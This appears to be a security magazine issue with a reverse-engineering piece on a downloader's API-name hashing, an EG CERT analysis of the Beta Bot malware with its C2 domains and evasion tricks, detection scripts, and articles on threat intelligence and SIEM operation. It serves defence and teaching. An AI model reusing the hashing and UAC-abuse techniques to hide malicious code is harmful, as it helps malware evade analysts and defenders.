While the mystery of the strange hexadecimal values continues, an even stranger subroutine shows up in the malware. It is not obvious what the purpose of the subroutine is, but there are some features of the code that hint at its purpose. Take a look at Figure 4 and see if you can determine anything useful from the subroutine instructions.

Figure 4: Subroutine with an unknown purpose

Here are some things to consider:

•The entry and exit instructions manipulate the runtime stack.
•The EDX register is utilized to generate some kind of 32-bit result.
•Values read from memory pointed to by EAX are used to alter EDX via an XOR operation.
•The subroutine loops until the value read from memory is a zero.

An experienced programmer may look at these characteristics and not see the overall purpose of the code. But sometimes intuition jumps in and creates that leap of understanding that ties everything together: this subroutine is creating a 32-bit hash value. Upon entry EAX points in memory to a 0-terminated string that represents the name of an exported DLL function. The bytes from the string are XORed with EDX and EDX is rotated 3 bits prior to each XOR operation.


The 32-bit value in EDX represents the hash value of the memory string. Figure 5 shows the same code with comments added.

Figure 5: Mystery revealed: 32-bit hash generator

What is the purpose of this code? It is used to build a hash value that represents the exported function name from a DLL. The purpose of the hash value is to hide the name of the exported function from anyone performing reverse engineering or malware analysis on the code. For example, running the code of a typical WIN32 program through the Strings program will reveal the text-based exported function list, an example of which is shown here:

ReadFile
CreateFileA
GetProcessHeap
FreeLibrary
GetCPInfo
GetACP
GetOEMCP
VirtualQuery
InterlockedExchange
MultiByteToWideChar
GetStringTypeA
GetStringTypeW

To disguise the exported function name the malware writer uses the hash value in place of the function name. To test this theory, a simple C program was written that duplicates the functionality of the hashing subroutine, using the same XOR and 3-bit rotate operations. A file containing all of the exported function names from KERNEL32.DLL is passed to the C program, which generates the 32-bit hash values for each function name. Here is a small portion of the results:

Figure 6: Hash values for KERNEL32.DLL exported function names

The hex value 410E2A69 is the malware writer’s way of hiding the name of the KERNEL32.DLL exported function MoveFileA being called. Going through the malicious assembly language, all the hash values being PUSHed were located and looked up. Some values did not match the list generated from KERNEL32.DLL, so exported function names from URLMON.DLL and NTDLL.DLL were used as well. Here are the corresponding DLL functions, in the order they are called from the code:

Hash Value   DLL Function               DLL
A412FD89     LoadLibraryA               KERNEL32.DLL
E4EC2161     URLDownloadToCacheFileA    URLMON.DLL
2D6D019      LocalAlloc                 KERNEL32.DLL
C5FF2F46     VirtualProtect             KERNEL32.DLL
410E2A69     MoveFileA                  KERNEL32.DLL
16EF74B      WinExec                    KERNEL32.DLL
D6196BE1     RtlExitUserThread          NTDLL.DLL

Just seeing this sequence of DLL calls reveals the overall intent of the malicious code. A file is downloaded from the Internet (via URLDownloadToCacheFileA) and executed (with WinExec).

Mystery Revealed

Having discovered all these secrets and tricks, we can now determine what the main portion of the machine language payload does:

Figure 7: Strange PUSH values finally revealed
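As an added example (not the author’s C program), the hashing subroutine re-implemented in Python and used the way the article uses it: EDX starts at zero and, for each byte of the name, is rotated 3 bits and XORed with the byte; the PUSHed constants are then looked up against a constructed export list standing in for the real DLL export tables. The article does not state the rotate direction; rotate-left is an inference, checked against the article’s own values (LoadLibraryA hashes to A412FD89).

```python
"""Recreate the malware's 32-bit API-name hash and map PUSHed constants back to names."""
from typing import Dict, Iterable, List, Optional, Tuple

MASK32 = 0xFFFFFFFF


def rol32(value: int, count: int) -> int:
    """Rotate a 32-bit value left by `count` bits (the x86 ROL instruction)."""
    count %= 32
    return ((value << count) | (value >> (32 - count))) & MASK32


def api_hash(name: str) -> int:
    """Hash an exported-function name the way the article's subroutine does.

    EDX starts at zero; for every byte of the 0-terminated name, EDX is rotated
    3 bits and then XORed with the byte; the loop stops at the NUL terminator.
    Rotating left (assumed here) reproduces the constants in the article, e.g.
    "LoadLibraryA" -> 0xA412FD89 and "WinExec" -> 0x016EF74B.
    """
    edx = 0
    for byte in name.encode("ascii"):
        edx = rol32(edx, 3) ^ byte
    return edx


def build_hash_table(exports: Iterable[Tuple[str, str]]) -> Dict[int, Tuple[str, str]]:
    """Precompute hash -> (function, dll) for every export we know about.

    This is the analyst's side of the trick: the malware only stores the hash,
    so we hash the export lists of the DLLs it uses and look the constants up.
    """
    return {api_hash(func): (func, dll) for func, dll in exports}


def resolve(pushed: Iterable[int],
            table: Dict[int, Tuple[str, str]]) -> List[Tuple[int, Optional[str], Optional[str]]]:
    """Map each PUSHed constant to (hash, function, dll); unknown hashes get None."""
    out: List[Tuple[int, Optional[str], Optional[str]]] = []
    for value in pushed:
        func, dll = table.get(value & MASK32, (None, None))
        out.append((value, func, dll))
    return out


# Constructed stand-in for a dump of each DLL's export table; a real analysis
# would feed in the complete export directories of KERNEL32.DLL, URLMON.DLL
# and NTDLL.DLL, as the article's C program did.
SAMPLE_EXPORTS = [
    ("ReadFile", "KERNEL32.DLL"), ("CreateFileA", "KERNEL32.DLL"),
    ("LoadLibraryA", "KERNEL32.DLL"), ("LocalAlloc", "KERNEL32.DLL"),
    ("VirtualProtect", "KERNEL32.DLL"), ("MoveFileA", "KERNEL32.DLL"),
    ("WinExec", "KERNEL32.DLL"), ("URLDownloadToCacheFileA", "URLMON.DLL"),
    ("RtlExitUserThread", "NTDLL.DLL"),
]

# The constants the article found being PUSHed, in call order
# (the table prints 2D6D019 and 16EF74B without their leading zero).
PUSHED_HASHES = [0xA412FD89, 0xE4EC2161, 0x02D6D019, 0xC5FF2F46,
                 0x410E2A69, 0x016EF74B, 0xD6196BE1]

if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    for value, func, dll in resolve(PUSHED_HASHES, table):
        print(f"{value:08X}  {func or '?':<25} {dll or '?'}")
```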

So, with a little effort and inspiration, the malware coder’s efforts to disguise what was really going on in the malicious code were defeated and its functionality revealed. The fascinating thing to think about here is that the malware coder took the technique of hashing and re-purposed it for something else. This is why creativity and imagination is important. It is important to the malware coder and it is also important to the malware analyst.




Reviews

Malware Review

Neurevt bot Malware Analysis

Introduction

Neurevt bot (“Beta Bot”) has a lot of functionality along with an extendable and flexible infrastructure. Upon installation, the bot injects itself into almost all user processes to take over the whole system. Moreover, it utilizes a mechanism that makes use of Windows messages and the registry to coordinate those injected codes. The bot communicates with its C&C server through HTTP requests. Different parts of the communication data are encrypted (mostly with RC4). Many components cover a large number of the most popular malicious functionalities, including downloading malware, DDoS attacks, and credential stealing.

File Identification

Eng. May Medhat, Malware Analyst at EG CERT

MD5           A4EDEA3CECE92C31D4C4049850F44A9E
SHA-1         6ADB7E751EE4F7C407832BC327E8CC16E8BBB679
Size (bytes)  231936
SubSystem     Windows GUI
Type          Executable


Information Gathering

The following snippets found during this phase show some capabilities of the real “Beta bot” for sale:

Neurevt Behavioral Analysis

1] The malware sets the registry value “ShowSuperHidden” to zero (default = 1) so that it stays hidden along with protected operating system files:

. HKU\S-1-5-21-3506987661-2624146946-3848342493-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden: 0x00000000

2] Betabot creates a winlogon0 folder and copies itself under a random name to the following paths:

. C:\ProgramData\winlogon0\[random_name].exe
. C:\Users\All Users\winlogon0\[random_name].exe

The first path will be used by the malware for persistence, as shown by the autorun tool output.

3] System Monitoring:

. Process neurevta4e.exe was started by explorer.exe
. Process “[random name].exe” was started by parent process “neurevta4e.exe”
. Process wuauclt.exe was started by “[random name].exe” and tries to connect to the malicious domain 7obby.com

4] By exploring the memory of running processes with “RWX” protection, it has been observed that the malware copied itself to the same memory area “0x7ff20000-0x7ffa2000” in many processes to keep persistence, except explorer.exe, whose infected memory area is “0x7ff10000-0x7ff92000”.

Infected processes are neither system authority processes nor service processes; they all run under the same user account as the infected processes, as shown below:


5] User-Mode System Call Hooking: The sample uses the “KiFastSystemCall” function for user-mode system call hooking. For more information about this system call hooking technique, check the following link: http://www.malwaretech.com/2014/06/usermode-system-call-hookingbetabot.html

6] Network Monitoring: The injected process wuauclt.exe (PID=700) tests connectivity by querying “www.update.microsoft.nsatc.net”. Then wuauclt.exe (PID=700) establishes a connection to “7obby.com” with the following fake user agent (the malware uses a fake popular user agent to avoid network-layer detection):

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)


The screenshot below shows that the malware sends encrypted messages to the command and control server, stored in ps0, ps1, cs0, cs1, cs2, cs3.

The svchost.exe process tries to resolve the following domains but could not find such names:

7] Configuration Extraction: The configuration section of the bot is encrypted inside the bot and decrypted while the bot is running. It can be extracted using the betabot-re script published at https://github.com/KenMacD/betabot-re



The output shows Betabot version 1.0.2.5, the owner ID “792476”, the primary malicious domain “7obby.com”, its backup domains betabot.zapto.org and betabu.zapto.org, and the keys used for encryption.
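As an added example (not from the analysis above or EG CERT), a Python hunt over constructed proxy-log lines that uses the indicators given so far: the beaconing domain, the two backup domains from the extracted configuration and the spoofed User-Agent. The log layout is assumed; the point is that the User-Agent string alone is a weak indicator, so it is only rated high when a client also talks to a known domain, or sends it alongside a different User-Agent.

```python
"""Hunt proxy logs for the Beta Bot beaconing indicators described in the analysis."""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Indicators from the analysis: the primary C2 domain, the two backup domains
# from the extracted configuration, and the spoofed User-Agent the bot sends.
C2_DOMAINS = {"7obby.com", "betabot.zapto.org", "betabu.zapto.org"}
FAKE_UA = "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)"

# Constructed proxy-log layout (hypothetical, not from the article):
#   <time> <client_ip> <method> <host> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Verdict severity: the domain is a hard indicator; the UA alone is weak because
# a genuine IE 7 on Windows NT 5.2 sends exactly the same string.
SEVERITY = {"clean": 0, "ua_only": 1, "ua_mismatch": 2, "c2": 3}


def parse(line: str) -> Dict[str, str]:
    """Split one log line into its fields; returns {} for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return {}
    time, client, method, host, ua = m.groups()
    return {"time": time, "client": client, "method": method,
            "host": host.lower(), "ua": ua}


def hunt(lines: List[str]) -> Dict[str, str]:
    """Return one verdict per client IP.

    c2          the client talked to a known Beta Bot domain
    ua_mismatch the client sent the bot's UA while other requests from the same
                client used a different UA, i.e. one process is spoofing
    ua_only     every request from the client carried the bot's UA (possibly a
                genuine old browser; review, do not block on this alone)
    clean       nothing matched
    """
    uas: Dict[str, Set[str]] = defaultdict(set)
    hit_c2: Set[str] = set()
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        uas[rec["client"]].add(rec["ua"])
        if rec["host"] in C2_DOMAINS:
            hit_c2.add(rec["client"])
    verdicts: Dict[str, str] = {}
    for client, seen in uas.items():
        if client in hit_c2:
            verdicts[client] = "c2"
        elif FAKE_UA in seen and len(seen) > 1:
            verdicts[client] = "ua_mismatch"
        elif FAKE_UA in seen:
            verdicts[client] = "ua_only"
        else:
            verdicts[client] = "clean"
    return verdicts


def worst_verdict(verdicts: Dict[str, str]) -> str:
    """Highest-severity verdict across all clients (useful as an alert summary)."""
    return max(verdicts.values(), key=SEVERITY.__getitem__, default="clean")


# Constructed sample log, not traffic captured from the sample. Client 10.0.0.5
# mirrors the observed sequence: a connectivity check to
# www.update.microsoft.nsatc.net, then the beacon to 7obby.com with the fake UA.
FIREFOX_UA = "Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0"
SAMPLE_LOG = [
    f'2015-03-01T10:00:01 10.0.0.5 GET www.update.microsoft.nsatc.net "{FAKE_UA}"',
    f'2015-03-01T10:00:02 10.0.0.5 POST 7obby.com "{FAKE_UA}"',
    f'2015-03-01T10:00:03 10.0.0.5 GET www.example.com "{FIREFOX_UA}"',
    f'2015-03-01T10:00:04 10.0.0.9 GET www.example.com "{FAKE_UA}"',
    f'2015-03-01T10:00:05 10.0.0.9 GET betabu.zapto.org "{FAKE_UA}"',
    f'2015-03-01T10:00:06 10.0.0.12 GET www.example.com "{FAKE_UA}"',
    f'2015-03-01T10:00:07 10.0.0.20 GET www.example.com "{FIREFOX_UA}"',
    f'2015-03-01T10:00:08 10.0.0.20 GET intranet.local "{FAKE_UA}"',
]

if __name__ == "__main__":
    for client, verdict in sorted(hunt(SAMPLE_LOG).items()):
        print(f"{client:<10} {verdict}")
```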

Malware Capabilities

The following shows some of the malware capabilities:

• Gathering information about software: Neurevt detects and gathers information about many software products, especially security and gaming software, through opened registry keys.

• Detecting many antivirus products: The following screenshot is an example of AVG antivirus processes detected by the sample.

• Privilege detection and escalation: RtlQueryElevationFlags is called with a pointer to a variable that receives the elevation state.

It tries to escalate privileges through fake errors in different languages, abusing the User Account Control (“UAC”) message feature; these can appear as shown in the screenshots below:

• Credential stealing: Neurevt tries to steal FTP software credentials; an example screenshot for FileZilla is shown below:

• DDoS toolkit: The Trojan may perform DDoS attacks using the following tools: condis, slowloris, udp. The malware also contains fake user agents that could help launch these attacks.

• Skype spam: Neurevt tries to access Skype via the SendInput API, targeting windows like “tSkMainFom” and “TZapCommunicator”, and sends messages to contacts:



Recommendations

• Think before you click! Read the prompts your system shows you and do not click “Yes” or “OK” thoughtlessly. In case of doubt, ask someone for help or try to search the Internet for more information about the prompt in question.
• An up-to-date comprehensive security solution with a malware scanner, firewall, web and real-time protection is an absolute must. A spam filter that protects you from unwanted spam emails also makes sense.
• The installed operating system, browser and its components as well as the installed security solution should always be kept up to date. Program updates should be installed as soon as possible to close existing security vulnerabilities.

In addition to these recommendations, more details exist at the following link: https://blog.gdatasoftware.com/blog/article/a-new-bot-on-the-market-beta-bot.html

Removal

To detect and remove this threat and other malicious software that may be installed on your computer, run a full system scan with an appropriate, up-to-date security solution.




Reviews

Intelligence Review

Knowing Your Adversary - Implementing a Cyber Threat Intelligence Program

Introduction

As far back as I can remember, there was always a need to have additional information for validation or confirmation that an incident, security event or investigation was complete, or just when it came to plain old protecting the company from threats. No matter the industry, all companies doing business on the World Wide Web, aka the “Internet”, must have a program in place to receive and/or provide intelligence and other information, in order to achieve the big picture when it pertains to any threat, aka your adversaries. It is important to also remember that adversaries do not necessarily have to be external sources, because the number one threat to all companies is the insider, negligent or not.

Harris D. Schwartz, Safeway Corporate Information Security Lead, Incident Response & Cyber Threat Intelligence


COMPOSITION OF A CYBER THREAT INTELLIGENCE PROGRAM

When it pertains to the design and structure of your cyber threat intelligence (CTI) program there will be known dependencies and contributors to think about and plan out. Not all CTI programs will be alike, although many might be similar or consistent due to industry working groups and collaborative arrangements between similar companies; e.g. big box retailers may have a similar framework and structure because the 2 or 3 companies are working together to identify and benchmark cyber threats. Knowing what content will comprise your CTI program will come from the benefit of knowing your own organization and the possible sources of information that can be “fed” or “ingested” into your CTI program. Also note that not all CTI programs have to be completely automated; there could be part manual and part automated, or for the most part automated and a little manual.

So, when we discuss dependencies, what am I speaking about? Well, as I mentioned previously, knowing your environment and corporate landscape will be important when deciding what content or information you would like, or think, needs to be consumed as intelligence sources within your CTI program. Coupled with knowing your organization is the concept of access and visibility with stakeholders in your company environment, and the ability to influence where needed to gain support for your CTI program. After all, the intelligence information (hopefully actionable, at least) you receive and analyze will be purposeful to your internal business partners and stakeholders. The other aspect of dependencies is the availability of internal technology resources, which also includes log sources. A CTI program can work independently of or in concert with your SIEM technology as well.

The other primary consideration for your Cyber Threat Intelligence program is the contributors, or sources, for your program. Contributors can be broken down into 4 categories (or more if needed):
A. Internal Partners
B. External Sources
C. Technology and Monitoring
D. Compliance and Risk

Let’s examine some examples of each category so you get a better picture of what sources would fall where.

Internal Partners: These sources could include Loss Prevention, Business Intelligence, Corporate Security (Physical), Human Resources, Risk Management, Investor Relations.

External Sources: The sources in this category include industry working groups, industry information sharing groups and listservs, government agencies, other corporate partners, etc.

Technology and Monitoring: Sources such as your SIEM feeds, independent log sources from firewalls, Intrusion Detection (IDS), anti-malware, etc., proactive monitoring and investigation initiatives and other associated data.

Compliance and Risk: Your various groups within InfoSec including risk, compliance, governance and associated groups.

BUILDING YOUR FRAMEWORK

(Framework overview graphic)

When building any program or initiative it’s important to build a “framework” of how your program will work/operate at a high level. You can add granularity where needed or where it makes sense. The graphic above depicts a sample framework that I have utilized and planned at numerous companies (where I worked) and/or companies I consulted with. There are a couple of key decisions that can be made at this point in the game:

How automated will the program be? In some instances, companies maintain different components in their program. As an example, the company may subscribe to threat feeds that they ingest into their SIEM environment. If a company utilizes a fully managed service, aka a Managed Security Solutions Provider (MSSP), then most of those ingest their own threat feeds and/or other external feeds as well.

To SIEM or not to SIEM? So in the above example, external threat feeds can be ingested into your SIEM solution and then correlated with your existing log data. Some companies choose to utilize a “threat correlator solution” that acts as the overall CTI SIEM, and all data (sources, contributors) flows into the threat correlator. A contributor of this data would be some or all of your SIEM logs.

Outcome of all the threat data: Based on your needs or wants, your CTI analysts can be producing various end products, including risk and threat assessments, Information Security Advisories that contain actionable intelligence, critical vulnerability alerts, issues identified within the organization that require additional investigation or research, link analysis between various events that could identify patterns or trends in your organization, and instances where security gaps are identified which require policy change in the environment.


IDENTIFYING YOUR ADVERSARIES

Most companies I know or have worked with want to know, or have a good idea of, who the threats are and where they are originating from. The combination of your CTI actions coupled with monitoring of your network will weed out the “small stones hitting the glass window” and raise to the surface your real threats, both inside and outside. This is where the cooperation between your CTI team and Security Operations team comes into play, through monitoring activities to identify normal and abnormal traffic and activity on your network.

The insider threat can include what I like to call “negligent insiders” and/or the insiders that are purposeful and know exactly what they are doing, either recruited by third parties or working alone. In instances where there may be heightened events like discharges, layoffs and reduction-in-force events, partnering with your HR teams will be beneficial in identifying potential threats before they become serious issues. The other type of insider that tends to be an issue is the “sympathizer” to outside groups like animal or environmental activist groups. These types of people need to be closely monitored in order to prevent issues from trending.

External threats can be wide and far-ranging: everything from an activist organization with a cyber arm to it, extremist organizations, sympathizer organizations, nation states, terrorism groups, cyber hacker organizations, cyber espionage teams, organized criminal gangs, and the list goes on. Those “small stones hitting the glass” threats are typically kids aged 13-17, who may have some great computer skills but are bored at home with nothing to do and, through the use of online “crime-as-a-service” offerings, end up sending large numbers of packets your way in the form of a SYN flood or sometimes a larger Distributed Denial of Service (DDoS) attack.

BENEFITS AND ADVANTAGES

For all purposes, creating, building and implementing a cyber threat intelligence program can be extremely beneficial for any organization, because you will likely stay "ahead of the curve", or in this case ahead of your adversaries or threats. Beyond gathering technical indicators of compromise (IOCs), indicators of attack (IOAs) and additional information, your CTI team can start to build intelligence and information on the cyber threat actors and groups behind the various tactics, techniques and procedures (TTPs) identified through your program. This is where "knowing your adversary" is very important. If you know who or what is targeting your company, executives or systems, then you will have a better chance of preventing and mitigating issues (security events) before they quickly transform into critical issues (security incidents) that can lead to far worse things like compromises, system breaches, denial of service and/or degradation of resources. Better yet, protecting your company's name, reputation, brand and revenue is important as well.

Additional advantages of your cyber threat intelligence program can arise between your security department and your internal customers (stakeholders, business units, etc.). As an example, if you were to produce a weekly or daily threat intelligence report, distribute it to your internal partners and make the content as relevant to your company as possible, these reports could open the door to internal customers requesting assistance in the form of a risk assessment for a new service they might be offering. When these reports are distributed to the right people, additional internal partners will be identified who ask to be included in the distribution. This opens up visibility for you and heightens your exposure in the company environment. The more people know about you, the better.

When it comes down to implementing your program there is nothing wrong with taking it in steps. As an example, you may start out with threat feeds ingested by your SIEM and an analyst working to create reports and advisories through monitoring and proactive investigations. Then there are cases where some industries are far more likely to face consistent cyber threat targeting, like energy, government and entertainment companies, so in these cases a more robust program needs to be implemented more quickly. Every company or organization will be different when it comes to implementing your program.

In situations where your executives are less interested in a CTI program, or believe it is not necessary, it will be important for you, the security executive or manager, to conduct a risk/threat profile exercise, either on your own or by hiring a contractor, to build a profile of the risks and threats facing your company. If you address these concerns with your executives in this manner and can tie in other examples of brand failure, legal actions or other negative effects caused by the threat groups, your company executives are likely to change their minds very quickly. Outside of all this, with any introduction of "actionable" intelligence that you can provide regarding a pending threat to the company or its systems (a zero-day vulnerability that could open your company up to hackers), most executives can see the bigger picture and will approve some spending on some level of a cyber threat intelligence program. It might just be a matter of "crawl, walk, run..."


Best Practice

Operating SIEM Solution

Ayman Hammouda
Senior Information Security Engineer at Security Meter

Greetings. In this article I would like to talk about SIEM technology from another perspective. First, let me ask a question: imagine you have a SIEM solution integrated with all nodes in your network. Does this mean you are getting the full benefit from the SIEM? Security Information & Event Management is defined as a real-time monitoring technology for all security logs collected from whatever devices you have. Obviously any SIEM project has two main phases: integration and operation. In this article I won't address any of the integration techniques for SIEM, because I know everyone can easily integrate his/her devices, applications, systems, etc.

But when you hear the quote "SIEM Solution Is the Backbone for Any Security Operation Center", you have to think about SIEM operation. Let's start by having a SIEM solution integrated with all systems, devices, applications, etc. in our network. Now, what will be the next step? The next steps are the operation part, as follows:


Defining the organization Administrator Accounts

Administrator accounts are the most powerful accounts, with the highest privileges in any environment, so compromising such an account is the highest risk. You will need to track every single activity taken by those admins, thus you have to define the administrator accounts in the SIEM solution.

Defining the organization Network Hierarchy

Imagine this step as teaching your network zones to the SIEM solution. From my point of view you will need to define at least the following zones:
o DMZ
o Internal Server Zones
o VoIP Networks
o Wireless Networks
o VPN Address Spaces
o Compliance Networks

Defining the organization Servers

In this step you will define your servers by their single function. At least the following functions have to be addressed:
o LDAP Servers
o DHCP Servers
o DNS Servers
o Mail Servers
o Proxy Servers
o Database Servers
o FTP Servers
o SSH Servers
o Syslog Servers
o SNMP Servers
o VoIP PBX Servers
o VPN Servers
o Web Servers
o Vulnerability Assessment Servers
o Remote Servers
o Network Management Servers
o Update Servers (used, for example, to distribute antivirus signatures)

Defining uncommon TCP/UDP ports

Most organizations don't use the default ports for known applications, databases and services, so you will need to define the non-default ports in your environment to be tracked by the SIEM solution and to reduce false positives.

Defining organization sensitive data

Sensitive data varies from one organization to another, so you will need to define what is sensitive from your organization's perspective, like HR data, financial data, credit cards, source code, etc.

Correlation Rules Tuning

This is considered the output of all the above phases. Any SIEM solution has its built-in correlation rules, but tuning SIEM correlation is an ongoing process that must be taken into consideration, as it differs from one environment to another. I think you can start with the organization policy and translate it into correlation rules; after that, search for test cases in your environment (applications, servers, databases, etc.) and create the correlation rules to detect such deviations. For example, I once noticed that someone had created a correlation rule to detect a rise in temperature on specific critical network devices, to solve a downtime issue. Finally, always remember that not every correlation rule is an offense.

Reporting & Monitoring

Monitoring a SIEM solution is not only tracking the offenses generated by the SIEM; for more efficiency you will have to look at the log activity collected from your devices to track any abnormal behavior that is not defined in your correlation rules. Reporting is considered the important part of SIEM for SOC operation. From the above steps you can list some of the important reports as follows:
o User tracking across all systems
o Administrative activity tracking
o Successful & failed admin/normal user authentications
o User creation, deletion & modification
o Offense status
o Traffic from DMZ/Internet zones to the internal zone
o Traffic to the internal server zone
o Compliance reports for PCI, ISO27K
o Policy violations
o Unsecured services used
o Statistics for all inbound & outbound traffic

Finally, flow integration will give you deeper analysis of network packet flows, and integration with vulnerability assessment tools will enhance the intelligence of the SIEM solution with powerful correlation between vulnerability and exploit detection. At this point you have an efficient SIEM solution, with admin accounts defined, the network hierarchy, all the organization servers, sensitive data tracking, built-in and your own correlation rules, and finally report generation and monitoring.
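The operation steps above (administrator accounts, network hierarchy, servers by function, non-default ports, sensitive data, correlation rules and the resulting reports), pulled together in one added Python example. It is not the article's code or any SIEM vendor's; every address, account name, port, path and threshold is constructed for illustration. The point it adds to the text is how the definitions and the rules depend on each other: the declared non-default ports (8443, 15432) keep legitimate DMZ-to-server traffic from tripping the "unknown service" rule, and a single failed admin logon is only counted in the report while the offense fires at a threshold, which is the "not every correlation rule is an offense" distinction in practice.

```python
"""Modelling the SIEM operation steps: definitions first, then correlation rules
and reports over them. Added example, not the article's code or any vendor's SIEM.
All addresses, account names, ports, paths and thresholds are constructed."""
import ipaddress
from collections import Counter

# Step 1: administrator accounts whose every action is tracked (constructed).
ADMIN_ACCOUNTS = {"administrator", "root", "svc_backup_admin"}

# Step 2: network hierarchy, zone name -> address space (constructed).
ZONES = {
    "DMZ": ipaddress.ip_network("192.0.2.0/24"),
    "InternalServers": ipaddress.ip_network("10.10.0.0/16"),
    "Wireless": ipaddress.ip_network("10.50.0.0/16"),
    "VPN": ipaddress.ip_network("10.60.0.0/16"),
}
ADMIN_LOGON_ZONES = {"InternalServers"}  # zones where interactive admin logons are expected

# Step 3: servers by function, address -> role (constructed).
SERVERS = {"10.10.1.5": "LDAP", "10.10.1.9": "Database", "10.10.2.3": "Web"}

# Step 4: declared service ports per role, including the non-default 8443 and 15432,
# so expected traffic does not trip the "unknown service" rule (fewer false positives).
SERVICE_PORTS = {"Web": {80, 443, 8443}, "Database": {15432}, "LDAP": {389, 636}}

# Step 5: sensitive data classes keyed by the path prefix that holds them.
SENSITIVE_PATHS = {"/shares/hr": "HR Data", "/shares/finance": "Financial Data", "/git": "Source Code"}

# Constructed SIEM events from authentication, network-flow and file-access sources.
EVENTS = [
    "ts=2015-03-30T09:00:01 type=auth user=administrator src=10.10.5.5 dst=10.10.1.5 result=success",
    "ts=2015-03-30T09:00:05 type=auth user=root src=192.0.2.17 dst=10.10.1.9 result=failure",
    "ts=2015-03-30T09:00:06 type=auth user=root src=192.0.2.17 dst=10.10.1.9 result=failure",
    "ts=2015-03-30T09:00:07 type=auth user=root src=192.0.2.17 dst=10.10.1.9 result=failure",
    "ts=2015-03-30T09:01:00 type=auth user=jsmith src=10.50.7.7 dst=10.10.2.3 result=failure",
    "ts=2015-03-30T09:02:00 type=flow src=192.0.2.17 dst=10.10.2.3 dport=8443 action=allow",
    "ts=2015-03-30T09:02:30 type=flow src=192.0.2.17 dst=10.10.1.9 dport=15432 action=allow",
    "ts=2015-03-30T09:02:45 type=flow src=192.0.2.17 dst=10.10.1.9 dport=4444 action=allow",
    "ts=2015-03-30T09:03:00 type=file user=svc_backup_admin src=10.60.2.2 path=/shares/hr/payroll.xlsx op=read",
]

def zone_of(ip):
    """Map an address to its declared zone, or 'Unknown' if no zone covers it."""
    addr = ipaddress.ip_address(ip)
    return next((name for name, net in ZONES.items() if addr in net), "Unknown")

def parse_kv(line):
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)

def admin_logon_from_unexpected_zone(events):
    """Admin authentication (any result) from a zone not listed in ADMIN_LOGON_ZONES,
    one offense per user/source pair rather than one per event."""
    keys = {(e["user"], e["src"], zone_of(e["src"])) for e in events
            if e.get("type") == "auth" and e.get("user") in ADMIN_ACCOUNTS}
    return [{"rule": "admin_logon_zone", "user": u, "src": s, "zone": z}
            for u, s, z in sorted(keys) if z not in ADMIN_LOGON_ZONES]

def admin_auth_failure_burst(events, threshold=3):
    """Repeated failed admin logons from one source. A single failure is only
    logged and reported; the offense fires when the threshold is reached."""
    failures = Counter((e["user"], e["src"]) for e in events
                       if e.get("type") == "auth" and e.get("result") == "failure"
                       and e.get("user") in ADMIN_ACCOUNTS)
    return [{"rule": "admin_auth_failures", "user": u, "src": s, "count": n}
            for (u, s), n in failures.items() if n >= threshold]

def dmz_to_internal_unknown_service(events):
    """Flows from the DMZ into the internal server zone on a port that is not a
    declared service port for the destination server's role."""
    offenses = []
    for e in (e for e in events if e.get("type") == "flow"):
        if zone_of(e["src"]) != "DMZ" or zone_of(e["dst"]) != "InternalServers":
            continue
        role = SERVERS.get(e["dst"], "Unknown")
        if int(e["dport"]) not in SERVICE_PORTS.get(role, set()):
            offenses.append({"rule": "dmz_unknown_service", "dst": e["dst"], "role": role, "dport": int(e["dport"])})
    return offenses

def sensitive_access_from_remote(events):
    """Access to a classified path from wireless or VPN address space."""
    return [{"rule": "sensitive_remote_access", "user": e["user"], "zone": zone_of(e["src"]), "data": label}
            for e in events if e.get("type") == "file" and zone_of(e["src"]) in {"Wireless", "VPN"}
            for prefix, label in SENSITIVE_PATHS.items() if e["path"].startswith(prefix)]

def reports(events):
    """The article's admin-activity, authentication and DMZ-to-internal reports."""
    return {
        "admin_activity": Counter(e["user"] for e in events if e.get("user") in ADMIN_ACCOUNTS),
        "auth": Counter((e["user"], e["result"]) for e in events if e.get("type") == "auth"),
        "dmz_to_internal": sum(1 for e in events if e.get("type") == "flow"
                               and zone_of(e["src"]) == "DMZ" and zone_of(e["dst"]) == "InternalServers"),
    }

def run(lines=EVENTS):
    events = [parse_kv(line) for line in lines]
    offenses = (admin_logon_from_unexpected_zone(events) + admin_auth_failure_burst(events)
                + dmz_to_internal_unknown_service(events) + sensitive_access_from_remote(events))
    return offenses, reports(events)
```

Running `run()` on the constructed events yields four offenses: root authenticating from the DMZ, three failed root logons from one source, a DMZ flow to the database server on port 4444 (8443 and 15432 pass because they were declared), and a VPN user reading HR data. The failed logon by jsmith appears only in the authentication report, which is where a non-admin single failure belongs until a rule for it is justified by a test case in your own environment.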
